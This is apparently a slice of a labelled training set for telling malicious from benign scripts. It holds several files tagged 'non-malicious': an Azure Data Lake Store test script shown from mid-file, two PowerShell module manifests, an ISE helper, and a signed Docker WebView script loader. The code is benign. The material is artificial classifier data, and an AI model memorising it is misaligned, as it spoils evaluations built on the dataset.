$emptyFilePath $emptyFileCreationDate=$result.LastWriteTime Assert-NotNull $result "No value was returned on empty file get" Assert-AreEqual "File" $result.Type Assert-AreEqual 0 $result.Length $result = New-AzDataLakeStoreItem -Account $accountName -path $contentFilePath -Value $content Assert-NotNull $result "No value was returned on content file creation" $result = Get-AzDataLakeStoreItem -Account $accountName -path $contentFilePath Assert-NotNull $result "No value was returned on content file get" Assert-AreEqual "File" $result.Type Assert-AreEqual $content.length $result.Length $result = New-AzDataLakeStoreItem -Account $accountName -path $unicodeContentFilePath Assert-NotNull $result "No value was returned on content file creation" Add-AzDataLakeStoreItemContent -Account $accountName -Path $unicodeContentFilePath -Value $unicodetext -Encoding Unicode $retrievedContent = Get-AzDataLakeStoreItemContent -Account $accountName -Path $unicodeContentFilePath -Encoding Unicode Assert-AreEqual $unicodetext $retrievedContent $result = New-AzDataLakeStoreItem -Account $accountName -path $utf32ContentFilePath -Value $utf32text -Encoding UTF32 Assert-NotNull $result "No value was returned on content file creation" $retrievedContent = Get-AzDataLakeStoreItemContent -Account $accountName -Path $utf32ContentFilePath -Encoding UTF32 Assert-AreEqual $utf32text $retrievedContent Assert-True {253402300800000 -ge $result.ExpirationTime -or 0 -le $result.ExpirationTime} [DateTimeOffset]$timeToUse = [Microsoft.Azure.Test.HttpRecorder.HttpMockServer]::GetVariable("absoluteTime", [DateTimeOffset]::UtcNow.AddSeconds(120)) $result = Set-AdlStoreItemExpiry -Account $accountName -path $contentFilePath -Expiration $timeToUse Assert-NumAreInRange $timeToUse.UtcTicks $result.Expiration.UtcTicks 500000 $result = Set-AdlStoreItemExpiry -Account $accountName -path $contentFilePath Assert-True {253402300800000 -ge $result.ExpirationTime -or 0 -le $result.ExpirationTime} $result = Get-AzDataLakeStoreChildItem -Account $accountName -path $folderToCreate Assert-NotNull $result "No value was returned on folder list" Assert-AreEqual 2 $result.length Add-AzDataLakeStoreItemContent -Account $accountName -Path $emptyFilePath -Value $content $result = Get-AzDataLakeStoreItem -Account $accountName -path $emptyFilePath Assert-NotNull $result "No value was returned on empty file get with content added" Assert-AreEqual "File" $result.Type Assert-AreEqual $content.length $result.Length $result = Join-AzDataLakeStoreItem -Account $accountName -Paths $emptyFilePath,$contentFilePath -Destination $concatFile Assert-NotNull $result "No value was returned on concat file" $result = Get-AzDataLakeStoreItem -Account $accountName -path $concatFile Assert-NotNull $result "No value was returned on concat file get" Assert-AreEqual "File" $result.Type Assert-AreEqual $($content.length*2) $result.Length $previewContent = Get-AzDataLakeStoreItemContent -Account $accountName -Path $concatFile Assert-AreEqual $($content.length*2) $previewContent.Length $previewContent = Get-AzDataLakeStoreItemContent -Account $accountName -Path $concatFile -Offset 2 Assert-AreEqual $(($content.length*2) - 2) $previewContent.Length $previewContent = Get-AzDataLakeStoreItemContent -Account $accountName -Path $concatFile -Offset 2 -Length $content.Length Assert-AreEqual $content.length $previewContent.Length $previewHeadTailFile = "/headtail/filetest.txt" $headTailContent = @" 1 2 3 4 "@ New-AzDataLakeStoreItem -Account $accountName -Path $previewHeadTailFile -Force -Value $headTailContent $headTailResult = Get-AzDataLakeStoreItemContent -Account $accountName -Path $previewHeadTailFile -Head 2 Assert-AreEqual 2 $headTailResult.Length Assert-AreEqual 1 $headTailResult[0] Assert-AreEqual 2 $headTailResult[1] $headTailResult = Get-AzDataLakeStoreItemContent -Account $accountName -Path $previewHeadTailFile -Tail 2 Assert-AreEqual 2 $headTailResult.Length Assert-AreEqual 3 $headTailResult[0] Assert-AreEqual 4 $headTailResult[1] $localFileInfo = Get-ChildItem $fileToCopy $result = Import-AzDataLakeStoreItem -Account $accountName -Path $fileToCopy -Destination $importFile Assert-NotNull $result "No value was returned on import file" $result = Get-AzDataLakeStoreItem -Account $accountName -path $importFile Assert-NotNull $result "No value was returned on import file get" Assert-AreEqual "File" $result.Type Assert-AreEqual $localFileInfo.length $result.Length $currentDir = Split-Path $fileToCopy $targetFile = Join-Path $currentDir "adlspstestdownload.txt" if(Test-Path $targetFile) { Remove-Item -path $targetFile -force -confirm:$false } Export-AzDataLakeStoreItem -Account $accountName -Path $concatFile -Destination $targetFile $downloadedFileInfo = Get-ChildItem $targetFile Assert-AreEqual $($content.length*2) $downloadedFileInfo.length $result = Move-AzDataLakeStoreItem -Account $accountName -Path $concatFile -Destination $moveFile Assert-NotNull $result "No value was returned on move file" $result = Get-AzDataLakeStoreItem -Account $accountName -path $moveFile Assert-NotNull $result "No value was returned on move file get" Assert-AreEqual "File" $result.Type Assert-AreEqual $($content.length*2) $result.Length Assert-Throws {Get-AzDataLakeStoreItem -Account $accountName -path $concatFile} $result = Move-AzDataLakeStoreItem -Account $accountName -Path $folderToCreate -Destination $moveFolder Assert-NotNull $result "No value was returned on move folder" $result = Get-AzDataLakeStoreItem -Account $accountName -path $moveFolder Assert-NotNull $result "No value was returned on move folder get" Assert-AreEqual "Directory" $result.Type Assert-AreEqual 0 $result.Length Assert-Throws {Get-AzDataLakeStoreItem -Account $accountName -path $folderToCreate} $result = New-AzDataLakeStoreItem -Account $accountName -path $summaryFolder -Folder Assert-NotNull $result "No value was returned on folder creation" $result = New-AzDataLakeStoreItem -Account $accountName -path $subFolderToCreate -Folder Assert-NotNull $result "No value was returned on folder creation" $result = New-AzDataLakeStoreItem -Account $accountName -path $subSubFolderToCreate -Folder Assert-NotNull $result "No value was returned on folder creation" New-AzDataLakeStoreItem -Account $accountName -Path $subFileToCreate -Force -Value $content $result = Get-AzDataLakeStoreChildItemSummary -Account $accountName -Path $summaryFolder Assert-AreEqual $result.Length $content.Length Assert-AreEqual $result.FileCount 1 $targetFile = Join-Path $currentDir "DuOutputAdls" Export-AzDataLakeStoreChildItemProperties -Account $accountName -Path $summaryFolder -OutputPath $targetFile -GetDiskUsage -IncludeFile $result = Get-Item -Path $targetFile Assert-NotNull $result "No file was created on export properties" Remove-Item -Path $targetFile Assert-True {Remove-AdlStoreItem -Account $accountName -paths "$moveFolder/movefile.txt" -force -passthru } "Remove File Failed" Assert-Throws {Get-AdlStoreItem -Account $accountName -path $moveFile} Assert-True {Remove-AzDataLakeStoreItem -Account $accountName -paths $moveFolder -force -recurse -passthru} "Remove folder failed" Assert-Throws {Get-AzDataLakeStoreItem -Account $accountName -path $moveFolder} Assert-True {Remove-AzDataLakeStoreItem -Account $accountName -paths $summaryFolder -force -recurse -passthru} "Remove folder failed" Assert-Throws {Get-AzDataLakeStoreItem -Account $accountName -path $summaryFolder} Assert-True {Remove-AzDataLakeStoreItem -Account $accountName -paths $encodingFolder -force -recurse -passthru} "Remove folder failed" Assert-True {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -PassThru} "Remove Account failed." Assert-Throws {Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function Test-DataLakeStoreFileSystemPermissions { param ( $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location -DisableEncryption Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account is not in succeeded state even after 30 min." } $folderToCreate = "/aclRecurseFolder" $aceUserId = "027c28d5-c91d-49f0-98c5-d10134b169b3" New-AdlStoreItem -Account $accountName -Path "/temp" $prevOwner=Get-AdlStoreItemOwner -Account $accountName -Path "/temp" -Type User $prevGroup=Get-AdlStoreItemOwner -Account $accountName -Path "/temp" -Type Group $currentOwner=Set-AdlStoreItemOwner -Account $accountName -Path "/temp" -Type User -Id $aceUserId -PassThru $currentGroup=Get-AdlStoreItemOwner -Account $accountName -Path "/temp" -Type Group Assert-AreEqual $aceUserId $currentOwner Assert-AreNotEqual $prevOwner $currentOwner Assert-AreEqual $prevGroup $currentGroup Remove-AdlStoreItem -Account $accountName -paths "/temp" -force $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-NotNull $result "Did not get any result from ACL get" Assert-True {$result.Count -ge 0} "UserAces is negative or null" $currentCount = $result.Count $result.Add("user:$aceUserId`:rwx") $toRemove = $result[$result.Count -1] Assert-AreEqual $aceUserId $toRemove.Id Set-AzDataLakeStoreItemAcl -Account $accountName -path "/" -Acl $result $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount+1) $result.Count $found = $false for($i = 0; $i -lt $result.Count; $i++) { if($result[$i].Id -like $aceUserId) { $found = $true $result.RemoveAt($i) break } } Assert-True { $found } "Failed to remove the element: $($toRemove.Entry)" Set-AzDataLakeStoreItemAcl -Account $accountName -path "/" -Acl $result $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount) $result.Count Set-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" -AceType User -Id $aceUserId -Permissions All $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount+1) $result.Count Remove-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" -AceType User -Id $aceUserId $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount) $result.Count Set-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" -Acl $([string]::Format("user:{0}:rwx", $aceUserId)) $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount+1) $result.Count Remove-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" -Acl $([string]::Format("user:{0}:---", $aceUserId)) $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount) $result.Count $result = New-AzDataLakeStoreItem -Account $accountName -path $folderToCreate -Folder Assert-NotNull $result "No value was returned on folder creation" Set-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" -AceType User -Permissions All -Id $aceUserId -Recurse $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount+1) $result.Count $targetFile = "./ScenarioTests/acloutput" Export-AzDataLakeStoreChildItemProperties -Account $accountName -Path "/" -OutputPath $targetFile -GetAcl -IncludeFile $result = Get-Item -Path $targetFile Assert-NotNull $result "No file was created on export properties" Remove-Item -Path $targetFile Remove-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" -AceType User -Id $aceUserId -Recurse $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual $($currentCount) $result.Count Remove-AzDataLakeStoreItemAcl -Account $accountName -Path "/" -Force -Default $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual 4 $result.Count Remove-AzDataLakeStoreItemAcl -Account $accountName -Path "/" -Force $result = Get-AzDataLakeStoreItemAclEntry -Account $accountName -path "/" Assert-AreEqual 3 $result.Count $permission = Get-AzDataLakeStoreItemPermission -Account $accountName -path "/" Assert-AreEqual 770 $permission Set-AzDataLakeStoreItemPermission -Account $accountName -path "/" -Permission 777 | Out-Null $permission = Get-AzDataLakeStoreItemPermission -Account $accountName -path "/" Assert-AreEqual 777 $permission Assert-True {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -PassThru} "Remove Account failed." Assert-Throws {Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function Test-NegativeDataLakeStoreAccount { param ( $location, $fakeaccountName = "psfakedataLakeaccounttest" ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account not in succeeded state even after 30 min." } Assert-Throws {New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location} $tagsToUpdate = @{"TestTag" = "TestUpdate"} Assert-Throws {Set-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $fakeaccountName -Tag $tagsToUpdate} Assert-Throws {Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $fakeaccountName} Assert-True {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -PassThru} "Remove Account failed." Assert-Throws {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -PassThru} Assert-Throws {Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function CreateAndGetVirtualNetwork ($resourceGroupName, $vnetName, $location = "westcentralus") { $subnetName = "Public" $addressPrefix = "10.0.0.0/24" $serviceEndpoint = "Microsoft.AzureActiveDirectory" $subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix $addressPrefix -ServiceEndpoint $serviceEndpoint $vnet = New-AzVirtualNetwork -Name $vnetName -ResourceGroupName $resourceGroupName -Location $location -AddressPrefix 10.0.0.0/16 -Subnet $subnet $getVnet = Get-AzVirtualNetwork -Name $vnetName -ResourceGroupName $resourceGroupName return $getVnet } function Test-EnumerateAndRestoreDataLakeStoreDeletedItem { param ( $fileToCopy, $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName + "-c12" New-AzResourceGroup -Name $resourceGroupName -Location $location $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account is not in succeeded state even after 30 min." } $folderToCreate1 = "/adlfolderTest1" $folderToCreate2 = "/adlfolderTest2" $fileToCreate1 = "/adlfolderTest1/adlfile1" $fileToCreate2 = "/adlfolderTest2/adlfile2" $result = New-AzDataLakeStoreItem -Account $accountName -path $folderToCreate1 -Folder Assert-NotNull $result "No value was returned on folder creation" $result = New-AzDataLakeStoreItem -Account $accountName -path $folderToCreate2 -Folder Assert-NotNull $result "No value was returned on folder creation" $result = New-AzDataLakeStoreItem -Account $accountName -path $fileToCreate1 Assert-NotNull $result "No value was returned on empty file creation" $result = New-AzDataLakeStoreItem -Account $accountName -path $fileToCreate2 Assert-NotNull $result "No value was returned on empty file creation" Assert-True {Remove-AzDataLakeStoreItem -Account $accountName -paths $fileToCreate1 -force -passthru } "Remove File Failed" Assert-Throws {Get-AzDataLakeStoreItem -Account $accountName -path $fileToCreate1} Assert-True {Remove-AzDataLakeStoreItem -Account $accountName -paths $fileToCreate2 -force -passthru } "Remove File Failed" Assert-Throws {Get-AzDataLakeStoreItem -Account $accountName -path $fileToCreate2} $out = Get-AzDataLakeStoreDeletedItem -Account $accountName -filter "adlfolderTest1" -Count 1000 foreach($item in $out) { Restore-AzDataLakeStoreDeletedItem -Account $accountName -Path $item.TrashDirPath -Destination $item.OriginalPath -Type "file" -Force -Passthru Assert-True { Restore-AzDataLakeStoreDeletedItem -Account $accountName -Path $item.TrashDirPath -Destination $item.OriginalPath -Type "file" -Force -Passthru} } $out = Get-AzDataLakeStoreDeletedItem -Account $accountName -filter "adlfolderTest2" -Count 1000 foreach($item in $out) { Assert-True { Restore-AzDataLakeStoreDeletedItem -Account $accountName $item -Force -Passthru} } Assert-True {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -PassThru} "Remove Account failed." Assert-Throws {Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } }
combined_dataset/train/non-malicious/sample_30_82.ps1
sample_30_82.ps1
# # Module manifest for module 'OCI.PSModules.Email' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Email.dll' # Version number of this module. ModuleVersion = '83.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'f1bd31ba-98e7-4163-b9d9-5016214290ab' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Email Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Email.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIEmailConfiguration', 'Get-OCIEmailDkim', 'Get-OCIEmailDkimsList', 'Get-OCIEmailDomain', 'Get-OCIEmailDomainsList', 'Get-OCIEmailReturnPath', 'Get-OCIEmailReturnPathsList', 'Get-OCIEmailSender', 'Get-OCIEmailSendersList', 'Get-OCIEmailSuppression', 'Get-OCIEmailSuppressionsList', 'Get-OCIEmailWorkRequest', 'Get-OCIEmailWorkRequestErrorsList', 'Get-OCIEmailWorkRequestLogsList', 'Get-OCIEmailWorkRequestsList', 'Move-OCIEmailDomainCompartment', 'Move-OCIEmailSenderCompartment', 'New-OCIEmailDkim', 'New-OCIEmailDomain', 'New-OCIEmailReturnPath', 'New-OCIEmailSender', 'New-OCIEmailSuppression', 'Remove-OCIEmailDkim', 'Remove-OCIEmailDomain', 'Remove-OCIEmailReturnPath', 'Remove-OCIEmailSender', 'Remove-OCIEmailSuppression', 'Update-OCIEmailDkim', 'Update-OCIEmailDomain', 'Update-OCIEmailReturnPath', 'Update-OCIEmailSender' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Email' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Start-Selected.ps1
Start-Selected.ps1
#Hightlight the name of a file or URL and this will opened or shown in browser if ($PSVersionTable.BuildVersion.build -le 7000) { # PowerShell V2 CTP3 function Start-Selected { $ed = $psise.CurrentOpenedFile.Editor start $ed.SelectedText } } else { # PowerShell W7 function Start-Selected { $file = $psIse.CurrentPowerShellTab.Output.SelectedText if ($file -eq '') { $file = $psise.CurrentFile.Editor.SelectedText } if ($file) { start $file } } } #Set-CustomMenu "Start Selected" {Start-Selected} 'Ctrl+Shift+S'
combined_dataset/train/non-malicious/sample_20_74.ps1
sample_20_74.ps1
# # Module manifest for module 'PowerShellProTools' # # Generated by: Ironman Software, LLC # # Generated on: 3/18/2024 # @{ # Script module or binary module file associated with this manifest. RootModule = 'PowerShellProTools.psm1' # Version number of this module. ModuleVersion = '2023.12.0' # Supported PSEditions # CompatiblePSEditions = @() # ID used to uniquely identify this module GUID = '081e109d-8485-4fe4-a1a3-68d147669875' # Author of this module Author = 'Ironman Software, LLC' # Company or vendor of this module CompanyName = 'Unknown' # Copyright statement for this module Copyright = 'Ironman Software, LLC' # Description of the functionality provided by this module Description = 'PowerShell script packaging, profiling, WPF and Windows Forms design, and desktop automation.' # Minimum version of the PowerShell engine required by this module # PowerShellVersion = '' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module # RequiredModules = @() # Assemblies that must be loaded prior to importing this module # RequiredAssemblies = @() # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess NestedModules = @('PowerShellToolsPro.Cmdlets.dll') # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Merge-Script', 'Install-PoshProToolsLicense', 'Get-PoshProToolsLicense', 'Measure-Block', 'Measure-Script', 'Show-WinFormDesigner', 'ConvertTo-WinForm', 'Show-PSScriptPad', 'Set-Hotkey', 'Get-Hotkey', 'Remove-Hotkey' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = 'pad' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. # Tags = @() # A URL to the license for this module. # LicenseUri = '' # A URL to the main website for this project. # ProjectUri = '' # A URL to an icon representing this module. # IconUri = '' # ReleaseNotes of this module ReleaseNotes = 'https://docs.poshtools.com/powershell-pro-tools-module' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_44_77.ps1
sample_44_77.ps1
let pluginUrl = window.chrome.webview.hostObjects.sync.external.GetPluginUrl(); let scripts = [pluginUrl, "Scripts/common.eventHandlers.js", "Scripts/docker.webCore.eventHandlers.js"]; let currentScriptElement = document.querySelector("script[src='Scripts/docker.webCore.plugin.js']"); if (currentScriptElement !== null) { scripts.forEach(element => { let newScriptElement = document.createElement("script"); newScriptElement.setAttribute("src", element); newScriptElement.setAttribute("type", "text/javascript"); newScriptElement.async = false; currentScriptElement.parentNode.insertBefore(newScriptElement, currentScriptElement.nextSibling); currentScriptElement = newScriptElement; }); } // SIG // Begin signature block // SIG // MIInzwYJKoZIhvcNAQcCoIInwDCCJ7wCAQExDzANBglg // SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor // SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC // SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg // SIG // X+ah+KdvfCBnE3Z3QtRiyytn7w3QlVsJD1vFr4g2au+g // SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA // SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV // SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH // SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv // SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT // SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX // SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR // SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v // SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv // SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA // 